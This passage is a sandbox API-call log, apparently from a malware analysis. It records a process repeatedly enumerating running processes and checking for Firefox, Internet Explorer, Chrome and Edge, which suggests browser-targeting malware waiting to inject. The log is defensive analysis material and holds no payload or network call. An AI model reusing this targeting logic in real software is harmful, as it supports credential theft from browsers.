th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.864] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.864] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.864] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.864] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.864] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.865] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0221.865] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0221.865] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0221.865] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.865] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.865] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.865] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.865] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.865] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.865] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.866] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0221.866] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0221.866] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0221.866] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.866] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.867] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0221.867] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0221.867] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0221.867] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.867] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.867] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0221.867] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0221.867] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0221.867] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.867] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.868] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0221.868] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0221.868] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0221.868] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.868] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.868] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0221.868] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0221.868] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0221.868] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.868] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.869] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0221.869] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0221.869] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0221.869] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.869] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.904] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0221.904] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0221.904] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0221.904] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.904] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.904] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0221.904] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0221.904] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0221.904] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.904] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0221.905] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0221.905] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0221.905] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0221.905] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0221.905] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0221.905] CloseHandle (hObject=0xd4) returned 1 [0221.905] Sleep (dwMilliseconds=0x3e8) [0222.964] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0222.966] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.967] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0222.967] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0222.967] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0222.967] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0222.967] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.967] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0222.967] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0222.967] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0222.967] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0222.967] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.968] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0222.968] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0222.968] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0222.968] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.968] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.968] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0222.968] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0222.968] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0222.968] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.968] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.969] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0222.969] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0222.969] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0222.969] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.969] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.969] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0222.970] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0222.970] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0222.970] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.970] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.970] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0222.970] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0222.970] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0222.970] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.970] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.971] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0222.971] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0222.971] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0222.971] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.971] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.971] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0222.971] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0222.971] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0222.971] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.971] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0222.972] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0222.972] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0222.972] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0222.972] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.972] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.972] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.972] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.972] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.972] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.972] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.973] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.973] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.973] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.973] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.973] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.973] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.974] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.974] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.974] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.974] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.974] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.974] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.974] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.974] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.974] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.975] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.975] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.975] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.975] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.975] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.975] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0222.975] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0222.975] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0222.975] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.975] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.976] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.976] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.976] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.976] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.976] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.976] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.976] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.976] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.976] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.976] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.977] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0222.977] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0222.977] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0222.977] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.977] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.977] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0222.977] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0222.977] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0222.978] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.978] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.978] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0222.978] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0222.978] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0222.978] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.978] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.979] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.979] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.979] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.979] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.979] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0222.979] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0222.979] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0222.979] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0222.979] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.979] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0222.980] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0222.980] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0222.980] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0222.980] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.980] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0222.980] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0222.980] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0222.981] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0222.981] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.981] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0222.981] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0222.981] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0222.981] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0222.981] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.981] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0222.982] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0222.982] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0222.982] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0222.982] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.982] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0222.982] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0222.982] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0222.982] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0222.982] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.982] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, 